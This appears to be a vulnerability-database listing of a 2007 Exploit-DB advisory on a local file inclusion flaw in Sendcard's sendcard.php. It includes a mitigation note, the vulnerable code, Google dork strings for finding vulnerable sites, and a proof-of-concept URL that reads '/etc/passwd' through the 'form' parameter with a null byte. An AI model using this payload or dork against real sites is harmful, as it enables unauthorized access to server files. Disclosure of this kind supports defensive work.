header-logo
Suggest Exploit
vendor:
by:
ettee
5.5
CVSS
MEDIUM
Local File Inclusion
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sendcard Local File Inclusion Vulnerability

The sendcard.php script is vulnerable to local file inclusion. The vulnerability allows an attacker to include arbitrary local files by manipulating the 'form' parameter in the URL. By appending '%00' to the 'form' parameter value, an attacker can bypass the input validation and include sensitive files, such as '/etc/passwd'. This can lead to unauthorized access to the server's files and potentially sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and properly sanitize the 'form' parameter value before including files. Additionally, access control measures should be implemented to restrict access to sensitive files.
Source

Exploit-DB raw data:

Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

# milw0rm.com [2007-05-01]

Navigation

Suggest Exploit

Services By CQR